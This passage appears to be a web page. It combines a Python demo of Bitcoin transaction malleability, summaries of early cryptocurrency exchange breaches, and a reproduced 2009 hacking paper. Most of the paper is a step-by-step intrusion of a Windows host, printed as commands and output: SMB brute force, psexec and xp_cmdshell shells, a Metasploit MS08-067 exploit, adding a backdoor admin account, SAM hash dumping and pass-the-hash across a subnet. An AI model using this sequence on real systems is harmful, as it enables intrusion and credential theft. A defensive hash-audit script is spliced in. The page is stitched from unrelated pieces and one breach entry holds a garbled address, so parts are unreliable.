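    assert 1 <= len(data) <= 0x4B
    return bytes([len(data)]) + data


def reencode_pushes(script: bytes) -> bytes:
    """Malleation: rewrite every direct push as OP_PUSHDATA1 <len> <data>. Same stack, new bytes."""
    out, i = b"", 0
    while i < len(script):
        op = script[i]
        if 1 <= op <= 0x4B:
            out += b"\x4c" + bytes([op]) + script[i + 1:i + 1 + op]
            i += 1 + op
        else:                                  # assumption: the sample scriptSig is push-only
            out += bytes([op])
            i += 1
    return out


def malleate(tx: Tx) -> Tx:
    vin = [TxIn(i.prev_txid, i.vout, reencode_pushes(i.script_sig), i.sequence) for i in tx.vin]
    return Tx(vin, tx.vout, tx.version, tx.locktime)


def sample_withdrawal() -> Tx:
    """Constructed P2PKH-style spend: 71 fake signature bytes and a fake 33-byte pubkey."""
    sig = bytes(range(1, 72))
    pubkey = b"\x02" + bytes(32)
    return Tx(vin=[TxIn("aa" * 32, 0, push(sig) + push(pubkey))],
              vout=[TxOut(50_000_000, b"\x76\xa9\x14" + bytes(20) + b"\x88\xac")])


def same_payment(a: Tx, b: Tx) -> bool:
    return a.normalized_id() == b.normalized_id()


if __name__ == "__main__":
    tx, m = sample_withdrawal(), malleate(sample_withdrawal())
    print("original txid:  ", tx.txid())
    print("malleated txid: ", m.txid())
    print("same payment?   ", same_payment(tx, m))   # True: same outpoints, same outputs
```

    A withdrawal system that marks a send as failed because the txid it remembered never appeared, and then sends again, is the behaviour the operators describe. Tracking spends by outpoint (which input was consumed) or by the normalized id above makes the malleated copy recognizable as the same payment.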

  • Bid Extreme

    Very little information available.

    As a result of a hacker attack, the BTC and LTC wallet was robbed. This fact was reported to law enforcement authorities.

    The stolen BTC and LTC belonged to all users. If they are recovered they will be returned to users in accordance with the state of their balances on 17.11.2013.

  • inputs.io

    A hosting account takeover via compromised email accounts, plus some kind of 2FA bypass on the hosting provider's side. Source code, wallets, and user data were exfiltrated by the attacker.

    Two hacks totalling about 4100 BTC have left Inputs.io unable to pay all user balances. The attacker compromised the hosting account through compromising email accounts (some very old, and without phone numbers attached, so it was easy to reset). The attacker was able to bypass 2FA due to a flaw on the server host side. Database access was also obtained, however passwords are securely stored and are hashed on the client. Bitcoin backend code was transferred to 10;[email protected]:[email protected] (most likely another compromised server).

  • Vircurex

    Cloud infrastructure compromise. After an initial credential breach, the attacker escalated access through social engineering. The victim blames the hosting provider for violating their own procedure for password resets.

    The attacker has acquired login credentials to our VPS control account with our hosting service provider and has then asked for the root password reset of all servers which – unfortunately – the service provider has then done and posted the credentials in their helpdesk ticket, rather than the standard process of sending it to our email address (which has 2FA protection); also the security setup of allowing only our IP range to login to the management console was not working. It was an additional security feature the provider offered but was obviously circumvented by the attacker. As a result of this incident we have moved all our services to a new provider who offers 2 factor authentication for all logins as well as other verification processes that we hope will make similar attempts impossible in the future.

  • Bitcoin Central

    This was an account takeover at the victim's hosting provider, which allowed access to a server hosting a hot wallet. It was part of a larger campaign against customers of the same provider.

    Someone managed to reset the password from our hosting provider web interface, this enabled the attacker to lock us out of the interface and request a reboot of the machine in ‘rescue’ mode. Using this, the attacker copied our hot wallet and sent away what was present.

    This very hosting provider (OVH) had been compromised a couple of days ago, in the exact same way, leading to loss of funds on mining.bitcoin.cz.

  • InstaWallet

    Given that a database was accessed, this was probably an infrastructure breach. Their comment about it being "impossible to reopen" suggests the service kept balances off-chain and could no longer trust its ledger.

    The Instawallet service is suspended indefinitely until we are able to develop an alternative architecture. Our database was fraudulently accessed, due to the very nature of Instawallet it is impossible to reopen the service as-is.

  • Mercado Bitcoin

    This is a tough translation but it seems like a clear application vulnerability involving some kind of coupon code system.

    (Translated)

    Mercado Bitcoin suffered an attack which, unfortunately, succeeded against its redeem-code implementation. Due to a coding error, it was possible for an attacker to generate new credit codes without the value being properly charged to the final balance, thereby generating a false amount of bitcoins within the system and withdrawing it during the night.

  • BitInstant

    The attacker pivoted several times after initially gaining access to the victim's domain registrar via social engineering. This allowed a DNS hijack, routing the company's email (and therefore password resets) to the attacker, who then reset the login of an exchange account holding BitInstant's BTC.

    The attacker contacted our domain registrar at Site5 posing as me and using a very similar email address as mine, they did so by proxying through a network owned by a haulage company in the UK whom I suspect are innocent victims the same as ourselves. Armed with knowledge of my place of birth and mother’s maiden name alone (both facts easy to locate on the public record) they convinced Site5 staff to add their email address to the account and make it the primary login (this prevented us from deleting it from the account). We immediately realized what was going on, and logged in to change the information back. After changing this info and locking the attacker out, overnight he was able to revert my changes and point our website somewhere else. Site5 is denying any damages, but we suspect this was partly their fault.

    After gaining access, they redirected DNS by pointing the nameservers to hetzner.de in Germany, they used hetzner’s nameservers to redirect traffic to a hosting provider in Ukraine. By doing this, he locked out both my login and Gareth’s login and they used this to hijack our emails and reset the login for one exchange (VirWox), enabling them to gain access and steal $12,480 USD worth of BTC. No other exchanges were affected due to either Multi-Factor Authentication, OTP, YubiKeys and auto lockdowns.

    The hacker was also able to pull a few hours of internal company emails. However due to mandatory PGP encryption between members of our company and tools like Cryptocat, sensitive information was not breached.

  • MT Gox

    The big one. Lots of speculation and not a lot of hard data. Everything from negligence to insider threat to outright fraud has been suggested.

    On Monday night, a number of leading Bitcoin companies jointly announced that Mt. Gox, the largest exchange for most of Bitcoin’s existence, was planning to file for bankruptcy after months of technological problems and what appeared to have been a major theft. A document circulating widely in the Bitcoin world said the company had lost 744,000 Bitcoins in a theft that had gone unnoticed for years. That would be about 6 percent of the 12.4 million Bitcoins in circulation.

    Mark Karpeles, the former CEO of Mt. Gox, told the Daily Beast last month, “I suspect that some of the missing bitcoins were taken by a company insider but when I tried to talk to the police about it, they seemed disinterested.”

  • BitFloor

    Attackers likely gained access through a cloud infrastructure provider and reached a server holding an unencrypted backup of the hot wallet keys.

    Last night, a few of our servers were compromised. As a result, the attacker gained access to an unencrypted backup of the wallet keys (the actual keys live in an encrypted area). Using these keys they were able to transfer the coins. This attack took the vast majority of the coins BitFloor was holding on hand. As a result, I have paused all exchange operations. Even though only a small majority of the coins are ever in use at any time, I felt it inappropriate to continue operating not having the capability to cover all account balances for BTC at the time.

  • Bitcoinica

    Infrastructure breach with access to a large hot wallet.

    It is with much regret that we write to inform our users of a recent security breach at Bitcoinica. At approximately 1:00pm GMT, our live production servers were compromised by an attacker and they used this access to deplete our online wallet of 18547 BTC.

  • Slush’s Pool

    A breach at Linode was the root cause here, and there’s plenty of information available to understand the breach. Credentials for a customer support team member were used, and eight Linode customers were compromised for having affiliations with bitcoin.

    After accessing the customer support interface, the attacker was able to access the individual account interface for their victims and change root passwords on customers’ machines. To apply this root password change, servers were rebooted.

    A VP at Linode responded.

    Somebody hacked my backup machine with pool data hosted on Linode and stole 3094 BTC (“hot” coins ready for payouts). Cold backup was not affected in any way by this hack.

    It looks like the user database has also been compromised. Although passwords are stored in SHA1 with salt, I strongly recommend changing your password on the pool immediately.

    Robbery of Bitcoins has no impact on pool users, I’m covering the loss from my own income (although it means that many months of my work is wasted).

  • Bitcoin7

    Attackers got onto Bitcoin7 infrastructure, as both wallets and database data were accessed. Given that “other websites” were owned, it’s possible a larger unknown shared hosting provider with other customers was compromised.

    On Oct 5th 2011 Bitcoin7.com became the victim of a number of pre-planned hacker attacks. While our investigation is still going, evidence reveals that the attacks originated from Russia and Eastern Europe.

    The attack itself took action not only against the bitcoin7.com server but also against other websites and servers which were part of the same network. Eventually the hackers managed to breach into the network, which subsequently led to a major breach into the bitcoin7.com website.

    As a result of the hacking, unknown individuals managed to gain full access to the site’s main bitcoin depository/wallet and 2 of the 3 backup wallets.

    In addition the hackers gained access to our user database.

  • MyBitcoin

    This sounds like an application vulnerability that allowed forged deposits that could eventually be withdrawn from a hot wallet. This sort of attack is more common with “off blockchain” wallets.

    After careful analysis of the intrusion we have concluded that the software that waited for Bitcoin confirmations was far too lenient. An unknown attacker was able to forge Bitcoin deposits via the Shopping Cart Interface (SCI) and withdraw confirmed/older Bitcoins. This led to a slow trickle of theft that went unnoticed for a few days. Luckily, we do keep a percentage of the holdings in cold storage so the attackers didn’t completely clean us out. Just to clarify, we weren’t “fully” hacked aka “rooted”. You can still trust our PGP, SSL, and Tor public keys.

  • Bitomat.pl

    The cause is very uncertain. The operator suspects a third party destroying a host on AWS, but it looks like operator error is highly possible due to the “breach” occurring during a major upgrade.

    (Translated)

    On 26 July 2011, at about 23:00, I found that the Bitcoin server was overloaded and I had to increase the RAM. As a result of this operation, the entire virtual machine was removed, and with it all the information, including the wallet and all of its backups. I have found that the data did not go into Nirvana because the Virtual Machine settings had been changed, even though I had changed nothing. Our hoster, Amazon Web Services, indicates that the deleted machine was configured so that, once shut down, it is irrevocably “destroyed” (including all data on the hard disks).

    I am still determining who changed the settings on the VM and whether it is possible to recover the deleted data. Unfortunately, the collaboration with Amazon Web Services (AWS) is proving very difficult. Once I realized that the virtual machine was lost, I immediately ordered AWS premium support, talked to the manager and asked for protection of my data. So far without success.

    To this day I could not find out the exact reasons for the misery. I suspect that the actions of third parties, who wanted to cover up their illegal activities or even wanted to crash the whole service, are responsible. Should my suspicions in that direction harden, I will go with the case to the police and the prosecutor’s office. For this, however, I need the cooperation of AWS, which is (as mentioned above) currently very difficult. Efforts at data recovery are of course still in progress.

  • The Art of Grey-box attack


    ######
    Info
    ######

    Title : The Art of Grey-Box Attack
    Author : ZeQ3uL (Prathan Phongthiproek)
    JabAv0C (Wiswat Aswamenakul)
    Team : CWH Underground [www.milw0rm.com/author/1456]
    Website : cwh.citec.us / www.citec.us
    Date : 2009-07-04

    ##########
    Contents
    ##########

    [0x00] – Introduction

    [0x01] – The Art of Microsoft Windows Attack

    [0x01a] – Scanning & Enumeration
    [0x01b] – Gaining Access
    [0x01c] – Escalating Privilege

    [0x02] – The Art of Unix/Linux Attack

    [0x02a] – Scanning & Enumeration
    [0x02b] – Gaining Access
    [0x02c] – Escalating Privilege

    [0x03] – Metasploit Ninja-Autopwned

    [0x03a] – Nmap+Metasploit Autopwned
    [0x03b] – Nessus+Metasploit Autopwned

    [0x04] – Client-Side Attack with Metasploit

    [0x04a] – Metasploit Payload Generator
    [0x04b] – MS-Office Macro Ownage
    [0x04c] – AdobeReader PDF Ownage

    [0x05] – References

    [0x06] – Greetz To

    #######################
    [0x00] – Introduction
    #######################

    Hi all, in this paper we will guide you through methods of hacking into Windows
    and Linux systems. Moreover, we also show the ways to use the popular hacking tools
    nmap and Metasploit. Those tools are more powerful than they used to be (we will see it ;D)

    We divide the paper into 7 sections, from 0x00 to 0x06. However, only sections 0x01 to
    0x04 are technical. In section 0x01 we show the steps to hack into a Windows 2000 operating
    system. In section 0x02 we switch to the steps of Linux hacking. The next section, 0x03,
    covers automatic exploitation using Metasploit combined with nmap or Nessus.
    The last technical section lets you see examples of exploiting client software in order to
    get access to a system 😀

    ##############################################
    [0x01] – The Art of Microsoft Windows Attack
    ##############################################

    In this section we talk about attacking Windows machines in a network. We start with scanning
    and enumeration, then we move on to gaining access to the Windows system and, finally, to escalating privilege
    in order to control the machine completely and use it to attack other machines in the network.

    ++++++++++++++++++++++++++++++++++
    [0x01a] – Scanning & Enumeration
    ++++++++++++++++++++++++++++++++++

    First, start with scanning using nmap (http://nmap.org), which is the best scanner in our opinion.
    The new version of nmap improves scanning speed, maps ports to service names and adds a custom script feature,
    which is perfect for penetration testing.

    In the first example, we use nmap to scan for open ports, which are the channels through which the system can be attacked:

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap -sV 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE VERSION
    80/tcp open http Microsoft IIS webserver 5.0
    135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
    139/tcp open netbios-ssn
    443/tcp open https?
    445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
    1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
    1026/tcp open msrpc Microsoft Windows RPC
    1027/tcp open msrpc Microsoft Windows RPC
    1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
    3372/tcp open msdtc?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
    SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
    SF:(GetRequest,6,"\x18\xc1\n\0x\x01")%r(RTSPRequest,6,"\x18\xc1\n\0x\x01")
    SF:%r(HTTPOptions,6,"\x18\xc1\n\0x\x01")%r(Help,6,"\x18\xc1\n\0x\x01")%r(S
    SF:SLSessionReq,6,"\x18\xc1\n\0x\x01")%r(FourOhFourRequest,6,"\x18\xc1\n\0
    SF:x\x01")%r(LPDString,6,"\x18\xc1\n\0x\x01")%r(SIPOptions,6,"\x18\xc1\n\0
    SF:x\x01");
    MAC Address: 00:0C:29:CC:CF:46 (VMware)
    Service Info: OS: Windows

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds

    [End Result]————————————————————————————

    From the result we get a list of open ports, and we know that this system runs IIS, NetBIOS, Endpoint Mapper, SMB and MSSQL 2000,
    and that the operating system is Windows 2000 (we pick Windows 2000 as the example because we want you to see the big picture of
    Windows hacking). The next step is information gathering from NetBIOS and SMB. Windows 2000 has the “Null Session” vulnerability
    (the holy grail of Windows vulnerabilities), which allows us to enumerate all accounts in the system, including security policies,
    local groups and file shares. We pick nmap to gather the information using Nmap scripts. In the past, we had to connect to the system
    through IPC$ (Null Session) by running the command [net use \\192.168.80.129 "" /u:""] and then enumerate the information with
    a tool such as SuperScan4 or Winfo. Nowadays Nmap (8.5Beta) can perform those tasks with the help of Nmap scripts (smb-enum-users, smb-enum-shares, etc.).

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap --script=smb-enum-users 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Host script results:
    | smb-enum-users:
    |_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor, SERVER\Guest, SERVER\IUSR_SERVER, SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary, SERVER\molly, SERVER\None, SERVER\TsInternetUser

    Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

    [End Result]————————————————————————————

    From the result, we know all users in the target system:

    – Administrator
    – Backup
    – epp
    – epp_contractor
    – Guest
    – IUSR_SERVER
    – IWAM_SERVER
    – Jim
    – John
    – mary
    – molly
    – TsInternetUser

    Other enumeration techniques are “LDAP Anonymous” binds and default SNMP community strings (public/private), which can also list all users of the target system.
    “LDAP Anonymous” => using ldapminer
    “Default SNMP Community String” => using snmpwalk
    Shared files and folders are also important. If permissions are not set properly, an attacker may directly upload malicious files to the system.

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap --script=smb-enum-shares 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Host script results:
    | smb-enum-shares:
    | Anonymous shares: IPC$
    |_ Restricted shares: COVERPG$, Fax$, Inetpub, scripts, ADMIN$, C$

    Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds

    [End Result]————————————————————————————

    From the result, we know all shared files:

    IPC$ << Anonymous Null Session
    COVERPG$
    Fax$
    Inetpub
    scripts
    ADMIN$
    C$

    Next, since we know all users from the Null Session, we can run a brute-force attack against those users with the Nmap script “smb-brute”.

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap --script=smb-brute 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Host script results:
    | smb-brute:
    | backup:pukcab => Login was successful
    |_ epp:password => Login was successful

    Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

    [End Result]————————————————————————————

    Looking at that result, we brute-forced the weak passwords of the users backup and epp.

    ++++++++++++++++++++++++++
    [0x01b] – Gaining Access
    ++++++++++++++++++++++++++

    Now we have 2 account credentials for the attack; we choose “epp”, whose password is “password”. Use psexec (PsTools from Sysinternals)
    to spawn a command shell back to us.

    [Psexec Result]———————————————————————————
    C:\>psexec \\192.168.80.129 -u epp -p password -e cmd.exe

    PsExec v1.71 – Execute processes remotely
    Copyright (C) 2001-2006 Mark Russinovich
    Sysinternals – www.sysinternals.com

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>ipconfig

    Windows 2000 IP Configuration

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . : localdomain
    IP Address. . . . . . . . . . . . : 192.168.80.129
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.80.2

    C:\WINNT\system32>net user

    User accounts for \\SERVER

    ——————————————————————————
    Administrator backup epp
    epp_contractor Guest IUSR_SERVER
    IWAM_SERVER Jim John
    mary molly TsInternetUser
    The command completed successfully.

    [End Result]————————————————————————————

    From the result, we can spawn a command shell with epp’s privilege (Administrators group) and then blah blah blah…

    The target uses MSSQL 2000, so we guess it uses the default username/password for MSSQL 2000 (sa / blank password). We use osql to spawn a command shell through the MSSQL stored procedure
    xp_cmdshell. This stored procedure is a gold mine for hackers, who use it as an interactive command shell; an attacker can use ‘osql’ to get a shell from the target.

    [Osql Result]———————————————————————————–
    C:\>osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'dir c:\' "
    output

    ——————————————————————————

    ———————————————————————–

    ———————————————————————–

    ——————————–
    Volume in drive C has no label.

    Volume Serial Number is 50C0-6A72

    NULL

    Directory of c:\

    NULL

    12/03/2004 04:39p 451 dir.txt
    06/04/2004 03:49p

    Documents and Settings
    19/03/2009 12:47a Inetpub
    19/03/2009 12:38a Program Files
    03/07/2009 04:55p WINNT
    1 File(s) 451 bytes
    4 Dir(s) 3,053,559,808 bytes free

    NULL

    C:\>osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'net user' "
    output

    ——————————————————————————

    ———————————————————————–

    ———————————————————————–

    ——————————–

    —————————————————————————–

    Administrator backup cwh

    epp epp_contractor Guest

    IUSR_SERVER IWAM_SERVER Jim

    John mary molly

    TsInternetUser

    or more errors.

    NULL

    NULL

    [End Result]————————————————————————————

    Note: Nmap scripts also include “ms-sql-info.nse” for scanning machines whose ‘sa’ account has a blank password.

    For the latest worms like Conficker/Downadup, Nmap scripts can check for the MS08-067 vulnerability and whether the system is infected by the worm with “smb-check-vulns”.

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap --script=smb-check-vulns 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:35 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Host script results:
    | smb-check-vulns:
    | MS08-067: VULNERABLE
    |_ Conficker: Likely CLEAN

    Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

    [End Result]————————————————————————————

    Now we know the target has the MS08-067 vulnerability, so we use the god of exploit suites => “Metasploit Framework”

    [Msf Console]———————————————————————————–

    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show targets
    msf exploit(ms08_067_netapi) > set TARGET 1
    TARGET => 1
    msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_bind_tcp
    PAYLOAD => generic/shell_bind_tcp
    msf exploit(ms08_067_netapi) > set RHOST 192.168.80.129
    RHOST => 192.168.80.129
    msf exploit(ms08_067_netapi) > exploit

    [*] Started bind handler
    [*] Triggering the vulnerability…
    [*] Command shell session 1 opened (192.168.80.131:51038 -> 192.168.80.129:4444)

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>ipconfig
    ipconfig

    Windows 2000 IP Configuration

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . : localdomain
    IP Address. . . . . . . . . . . . : 192.168.80.129
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.80.2

    C:\WINNT\system32>net user cwh 1234 /add
    net user cwh 1234 /add
    The command completed successfully.

    C:\WINNT\system32>net localgroup administrators cwh /add
    net localgroup administrators cwh /add
    The command completed successfully.

    C:\WINNT\system32>net user
    net user

    User accounts for \\

    ——————————————————————————-
    Administrator backup cwh
    epp epp_contractor Guest
    IUSR_SERVER IWAM_SERVER Jim
    John mary molly
    TsInternetUser
    The command completed with one or more errors.

    [End Msf]—————————————————————————————

    The most popular tool for scanning, enumeration and vulnerability assessment is Nessus (www.nessus.org). It has many features like high-speed discovery,
    configuration audit, sensitive data discovery and vulnerability analysis. The best thing: it’s FREE !!!

    ++++++++++++++++++++++++++++++++
    [0x01c] – Escalating Privilege
    ++++++++++++++++++++++++++++++++

    The next step is to dump the SAM file from the target to get all the password hashes. Sure, we can use Nmap !!
    We can read the information in the SAM file only when we have administrator privilege (epp’s account is in the Administrators group).

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap --script=smb-pwdump --script-args=smbuser=epp,smbpass=password 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Host script results:
    | smb-pwdump:
    | Administrator:1010 => F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
    | backup:1005 => E84F09BA27610849AAD3B435B51404EE:94FF50F81F9885648A05438F63EA9F91
    | epp:500 => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
    | epp_contractor:1007 => 60F898DDDCAE534EAAD3B435B51404EE:148301D12E96ED2CE24A20C6ED9A2EAF
    | Guest:501 => A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
    | IUSR_SERVER:1001 => 0C2A09C60FF052D3518640B5D8EB223A:E9C4226B18D023A932473576E62EB5E9
    | IWAM_SERVER:1002 => A373B0BEBCEED1FAD95379C32DAD5DEF:803F59A7EA1EA9A65A15310B58A015D3
    | Jim:1009 => 209CA2D6E74286E9AAD3B435B51404EE:FF623167AECD14984A0A97E4D3989A89
    | John:1004 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
    | mary:1003 => 879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
    | molly:1008 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
    |_ TsInternetUser:1000 => 52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52

    Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds

    [End Result]————————————————————————————

    Now we have all the hashes from the target system. In the past we needed to crack the passwords with a tool such as Cain or rcrack
    using a technique called “rainbow tables”, but that steals sleeping time from us. We can save that time with one of nmap’s features:
    Nmap can try to log in to other machines using the gathered hashes and the list of usernames. We do not need to pre-crack the hashes.
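    A dump in this format is also what a defender audits. As an added example (not code from the paper), the script below parses smb-pwdump lines in the layout shown above and flags what should be fixed: LM hashes still being stored (turn on the NoLMHash policy), passwords of seven characters or fewer, blank passwords, and the same NT hash on several accounts, which is the password reuse that lets one captured hash log in elsewhere. The sample input is constructed (three lines copied from the output above, two made up); EMPTY_LM_HALF and EMPTY_NT are the well-known hashes of an empty password.

```python
import re
from collections import defaultdict

# Well-known constants (not taken from the page): the LM hash of an empty
# 7-character half-block, and the NT hash of an empty password.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# Matches the smb-pwdump output lines shown above: "| user:rid => LM:NT"
PWDUMP_LINE = re.compile(
    r"^\|_?\s*(?P<user>[^:\s]+):(?P<rid>\d+)\s*=>\s*"
    r"(?P<lm>[0-9A-Fa-f]{32}):(?P<nt>[0-9A-Fa-f]{32})\s*$"
)

# Constructed sample: backup, John and molly are copied from the output above;
# Administrator (no LM hash stored) and Guest (blank password) are made up.
SAMPLE_PWDUMP = """\
Host script results:
| smb-pwdump:
| Administrator:500 => AAD3B435B51404EEAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF
| backup:1005 => E84F09BA27610849AAD3B435B51404EE:94FF50F81F9885648A05438F63EA9F91
| John:1004 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
| molly:1008 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
|_ Guest:501 => AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
"""


def parse_pwdump(text):
    """Return one dict per account line; lines that do not match are ignored."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_LINE.match(line.strip())
        if m:
            d = m.groupdict()
            d["lm"], d["nt"] = d["lm"].upper(), d["nt"].upper()
            d["rid"] = int(d["rid"])
            entries.append(d)
    return entries


def audit_pwdump(entries):
    """Flag the conditions that make hash-only logins like the one above possible."""
    findings = {
        "lm_hash_stored": [],            # LM hashing enabled: trivially crackable
        "password_7_chars_or_less": [],  # second LM half empty => short password
        "empty_password": [],
        "shared_password": [],           # same NT hash => same password on several accounts
    }
    by_nt = defaultdict(list)
    for e in entries:
        if e["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(e["user"])
            if e["lm"][16:] == EMPTY_LM_HALF:
                findings["password_7_chars_or_less"].append(e["user"])
        if e["nt"] == EMPTY_NT:
            findings["empty_password"].append(e["user"])
        else:
            by_nt[e["nt"]].append(e["user"])
    for users in by_nt.values():
        if len(users) > 1:
            findings["shared_password"].append(sorted(users))
    return findings


if __name__ == "__main__":
    for key, val in audit_pwdump(parse_pwdump(SAMPLE_PWDUMP)).items():
        print(f"{key}: {val}")
```

    Run against a real dump, the shared_password list is the set of accounts to rotate first; unique local administrator passwords per machine remove the lateral step the paper relies on.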

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # cat password.txt
    F703F386322B0662E72C57EF50F76A05
    E52CAC67419A9A224A3B108F3FA6CB6D
    209CA2D6E74286E9AAD3B435B51404EE
    bt nmap-4.85BETA10 # nmap --script=smb-brute --script-args=userdb=usernames.txt,passdb=password.txt 192.168.80.1/24

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.100:
    PORT STATE SERVICE
    445/tcp open microsoft-ds

